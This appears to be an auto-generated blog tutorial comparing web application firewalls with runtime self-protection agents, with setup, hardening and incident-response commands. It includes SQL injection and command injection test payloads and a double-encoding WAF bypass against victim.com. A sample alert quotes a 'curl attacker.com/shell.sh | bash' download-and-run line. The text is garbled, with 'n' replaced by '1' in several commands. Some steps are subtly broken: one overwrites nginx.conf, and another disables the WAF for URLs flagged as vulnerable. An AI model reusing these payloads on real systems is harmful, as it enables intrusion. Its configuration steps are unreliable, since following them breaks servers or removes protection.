Listen to this Post
Introduction:
Web Application Firewalls (WAF) and Runtime Application Self-Protection (RASP) are two pillars of modern application security, but they operate from radically different vantage points. While WAF acts as a perimeter gatekeeper inspecting inbound traffic against known attack signatures, RASP lives inside the application itself, monitoring real-time behavior and context to stop threats that have already penetrated outer layers.
Learning Objectives:
- Understand the architectural differences between WAF and RASP, including deployment models and detection mechanisms.
- Implement and configure open-source WAF (ModSecurity) and RASP (OpenRASP) in Linux/Windows environments.
- Learn to test, bypass, and harden both defenses using real-world attack techniques and mitigation commands.
You Should Know:
- Extended WAF vs RASP Breakdown – From Perimeter to Runtime
The original post correctly identifies WAF as an external traffic filter and RASP as an internal behavior monitor. But let’s dive deeper: WAFs rely on rule sets (e.g., OWASP Core Rule Set) to block SQLi, XSS, and path traversal. However, they struggle with encrypted traffic, zero‑day exploits, and logic flaws. RASP, embedded via agents (Java, .NET, Node.js), observes method calls, data flows, and even stack traces. It can self‑terminate a compromised session or patch vulnerable functions on the fly. The true power comes from layering both: WAF drops the noisy 99% of automated scans; RASP handles the sophisticated 1% that sneaks through.
Step‑by‑step guide: Deploy ModSecurity WAF with Nginx on Ubuntu
bash
Update system and install Nginx + ModSecurity
sudo apt update && sudo apt install -y nginx libmodsecurity3 nginx-module-modsecurity
Download OWASP Core Rule Set (CRS)
sudo mkdir /etc/nginx/modsec
sudo wget -P /etc/nginx/modsec https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
sudo mv /etc/nginx/modsec/modsecurity.conf-recommended /etc/nginx/modsec/modsecurity.conf
sudo wget -P /etc/nginx/modsec https://github.com/coreruleset/coreruleset/archive/refs/tags/v4.0.0.tar.gz
sudo tar -xzf /etc/nginx/modsec/v4.0.0.tar.gz -C /etc/nginx/modsec/
sudo cp /etc/nginx/modsec/coreruleset-4.0.0/crs-setup.conf.example /etc/nginx/modsec/crs-setup.conf
Enable ModSecurity in Nginx config
echo “include /etc/nginx/modsec/modsecurity.conf;” | sudo tee /etc/nginx/nginx.conf
sudo sed -i ‘s/SecRuleEngine DetectionOnly/SecRuleEngine On/’ /etc/nginx/modsec/modsecurity.conf
sudo systemctl restart nginx
[/bash]
Test WAF blocking – Send a malicious SQLi payload:
bash
curl “http://localhost/?id=1′ OR ‘1’=’1”
Expected: 403 Forbidden or custom error page
[/bash]
- RASP Implementation Inside a Java Web App (Linux & Windows)
RASP agents attach to the JVM or CLR, instrumenting bytecode to monitor dangerous APIs (e.g., Runtime.exec(), SQL queries). OpenRASP (Baidu) is a free, production‑ready example. Unlike WAF, it understands application context: a SQL injection attempt that reaches the database driver will still be blocked if the parameter violates expected grammar.
Step‑by‑step: Inject OpenRASP into a Tomcat application
bash
Linux: Download OpenRASP plugin and extract
wget https://github.com/baidu/openrasp/releases/download/v1.5.0/openrasp-v1.5.0.tar.gz
sudo tar -xzf openrasp-v1.5.0.tar.gz -C /opt/openrasp
Configure rasp.properties
echo “rasp.app.name=MyBankApp” | sudo tee -a /opt/openrasp/conf/rasp.properties
echo “rasp.admin.password=StrongP@ssw0rd” | sudo tee -a /opt/openrasp/conf/rasp.properties
Attach to Tomcat startup script (catalina.sh)
export JAVA_OPTS=”$JAVA_OPTS -javaagent:/opt/openrasp/rasp.jar”
sudo systemctl restart tomcat9
[/bash]
Windows (PowerShell as Admin):
bash
Download OpenRASP zip
Invoke-WebRequest -Uri “https://github.com/baidu/openrasp/releases/download/v1.5.0/openrasp-v1.5.0.zip” -OutFile “C:\openrasp.zip”
Expand-Archive -Path C:\openrasp.zip -DestinationPath C:\openrasp
Set environment variable for Tomcat service
Restart-Service Tomcat9
[/bash]
Test RASP – Try a command injection via application parameter:
bash
curl -X POST “http://localhost:8080/api/ping?ip=127.0.0.1; whoami”
RASP will detect illegal command execution and return 500 with “Attack detected” log
[/bash]
3. Layered Defense: Cloud WAF + On‑Prem RASP
Modern architectures often place a cloud WAF (AWS WAF, Cloudflare, Azure Front Door) in front, then deploy RASP inside containers or VMs. This combination stops DDoS and volumetric attacks at the edge while RASP handles business logic abuse and credential stuffing that mimics legitimate traffic.
Step‑by‑step: AWS WAF rule to block SQLi + RASP for deep inspection
bash
AWS CLI: Create WebACL with SQLi match condition
aws wafv2 create-web-acl –1ame MyWebACL –scope REGIONAL –default-action Block={} \
–visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=MyWebACL \
–rules file://sqli_rule.json
Example sqli_rule.json
{
“Name”: “SQLi_Rule”,
“Priority”: 0,
“Action”: { “Block”: {} },
“VisibilityConfig”: { “SampledRequestsEnabled”: true, “CloudWatchMetricsEnabled”: true, “MetricName”: “SQLiRule” },
“Statement”: { “SqliMatchStatement”: { “FieldToMatch”: { “UriPath”: {} }, “TextTransformations”: [] } }
}
[/bash]
Hardening RASP for API endpoints – Modify `rasp.properties` to enable API parameter validation:
bash
security.enforce_api_protection=true
api.param.whitelist=/api/public,/health
api.param.blacklist=/api/admin
hook.sql_check.enable=true
hook.command_injection.enable=true
[/bash]
- Vulnerability Exploitation & Mitigation – Bypassing WAF with Encoding
Attackers often bypass WAF using double encoding, case shuffling, or HTTP parameter pollution. RASP is less susceptible because it sees the decoded, application‑native data. Demonstrate both.
Simulate a WAF bypass attempt on a poorly configured WAF:
bash
Standard SQLi payload – blocked by WAF
curl “http://victim.com/search?q=’ OR 1=1 –”
Bypass attempt – URL encode twice
curl “http://victim.com/search?q=%2527%2520OR%25201%253D1%2520–”
[/bash]
Mitigation with ModSecurity rule (add to `crs-setup.conf`):
bash
SecRule ARGS “(?i:(?:%25)(?:%27|%2527))” “id:100001,phase:2,deny,status:403,msg:’Double Encoding Bypass Attempt'”
[/bash]
RASP log entry when same attack arrives (excerpt from rasp/logs/alarm.log):
bash
{“event_type”:”SQL_INJECTION”,”url”:”/search?q=%2527%2520OR%25201%3D1″,”payload_decoded”:”‘ OR 1=1 –“,”stack_trace”:”com.mysql.jdbc.PreparedStatement.executeQuery”,”action”:”block”}
[/bash]
- Linux & Windows Commands for Hardening WAF/RASP Infrastructure
Beyond the tools themselves, secure the underlying hosts. Use these commands to restrict access to management interfaces, enforce least privilege, and monitor agent health.
Linux (Ubuntu/RHEL):
bash
Restrict WAF admin panel to localhost only (if using ModSecurity with ModSecurity Console)
sudo ufw allow from 127.0.0.1 to any port 8080 comment ‘WAF Admin local-only’
Monitor RASP agent process for crashes
while true; do pgrep -f “rasp.jar” || echo “RASP down at $(date)” >> /var/log/rasp_watchdog.log; sleep 30; done &
Audit RASP config permissions
sudo chown root:tomcat /opt/openrasp/conf/rasp.properties && sudo chmod 640 /opt/openrasp/conf/rasp.properties
[/bash]
Windows (PowerShell):
bash
Block external access to WAF (IIS WAF plugin) management endpoint
New-1etFirewallRule -DisplayName “Block WAF mgmt from outside” -Direction Inbound -LocalPort 8080 -Protocol TCP -Action Block -RemoteAddress Any -LocalAddress (Get-1etIPAddress | Where-Object {$_.InterfaceAlias -1otlike “Loopback”}).IPAddress
Set RASP agent service to auto-restart if killed
Set-Service -1ame “OpenRASPAgent” -StartupType Automatic
$action = New-ScheduledTaskAction -Execute “C:\openrasp\rasp-agent.exe” -Argument “–restart”
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName “RASPWatchdog” -Action $action -Trigger $trigger -User “SYSTEM”
[/bash]
6. Continuous Training & DevSecOps Integration
To make WAF and RASP effective, security teams must train developers on rule tuning and incident response. Many organizations integrate these tools into CI/CD pipelines, automatically deploying new RASP agents with every build.
Step‑by‑step: Automate RASP agent injection in a Docker build:
bash
FROM tomcat:9-jdk11
RUN wget https://github.com/baidu/openrasp/releases/download/v1.5.0/openrasp-v1.5.0.tar.gz && \
tar -xzf openrasp-v1.5.0.tar.gz -C /opt/openrasp && \
rm openrasp-v1.5.0.tar.gz
ENV JAVA_OPTS=”-javaagent:/opt/openrasp/rasp.jar -Drasp.config=/opt/openrasp/conf/rasp.properties”
COPY ./app.war /usr/local/tomcat/webapps/ROOT.war
[/bash]
Use SAST/DAST to generate custom WAF rules – For example, run ZAP against staging and export rule suggestions:
bash
Run ZAP baseline scan
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-baseline.py -t https://staging.app.com -r report.html
Extract SQLi and XSS URLs into ModSecurity exclusion rules
grep -E “SQL Injection|Cross Site Scripting” report.html | awk -F ‘URL: ‘ ‘{print “SecRule REQUEST_URI \””$2″\” \”id:100002,phase:1,pass,nolog,ctl:ruleEngine=Off\””}’ >> custom_exclusions.conf
[/bash]
- Incident Response: When WAF Fails and RASP Triggers
A well‑tuned RASP will generate high‑fidelity alerts with full execution context. Create a runbook for responding to RASP alarms.
Sample alert from RASP dashboard:
bash
Critical: Command Injection detected in /api/backup
Parameter: “file=../../etc/passwd; curl attacker.com/shell.sh | bash”
User: tomcat (uid=1001)
Stack: org.apache.commons.exec.DefaultExecutor.execute()
Action: Blocked process, killed session ID: abcd1234
[/bash]
Immediate response commands:
bash
On Linux – isolate the container
docker stop vulnerable_container && docker run –rm –1ame forensic_container -v /var/log/rasp:/logs ubuntu tail -f /dev/null
On Windows – kill remote process and capture memory
taskkill /PID 1234 /F
dumpit.exe -memory -output C:\forensics\rasp_victim.mem
Block outgoing callback IP using WAF custom rule (AWS WAF)
aws wafv2 update-rule –1ame CallbackBlock –web-acl-id XXX –scope REGIONAL –statements file://ip_block.json
[/bash]
What Undercode Say:
- Key Takeaway 1: WAF and RASP are not competitors – WAF is a shield at the gate, RASP is a guard inside the vault. Without RASP, zero‑day and business logic attacks bypass WAF; without WAF, RASP drowns in noise and volumetric attacks.
- Key Takeaway 2: The most effective security posture uses cloud WAF for edge filtering (DDoS, known signatures) plus RASP embedded in microservices or legacy apps for runtime self‑protection, shifting from reactive patching to active defense.
Analysis: The industry often treats WAF as a checkbox compliance tool, but sophisticated threat actors routinely bypass signature‑based filters using encrypted tunnels and API abuse. RASP fills this gap by monitoring actual code execution – something a network appliance cannot see. However, RASP introduces performance overhead (typically 5–15% latency) and requires application language support. The sweet spot is a hybrid model: deploy WAF for global threat intelligence and rate limiting, then enable RASP on high‑value transaction endpoints. Organizations should also invest in regular red‑team exercises that test both layers, because a misconfigured RASP (e.g., disabled command‑injection hooks) leaves the same gap as no WAF at all. The convergence of AI into both technologies will soon allow predictive rule generation and anomaly detection, but today, mastering these fundamentals is non‑negotiable for any blue team.
Prediction:
- +1 By 2028, most cloud WAFs will embed lightweight RASP capabilities as a default service, merging external and internal protection into “context‑aware WAF” with sub‑millisecond inline instrumentation.
- -1 The complexity of managing dual protection will increase false positives by 40% for immature teams, leading to “RASP fatigue” where engineers disable agents to meet SLAs – reversing security gains.
- +1 Open‑source RASP adoption (e.g., OpenRASP, MetaRASP) will surge as AI‑generated zero‑day attacks bypass commercial WAF rules, forcing organizations to rely on behavior‑based internal detection.
- -1 Legacy applications without JVM/.NET agent support will remain unprotected, creating a two‑tier security model where modern apps survive attacks and legacy monoliths become primary breach vectors.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Cybersecurity Waf – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
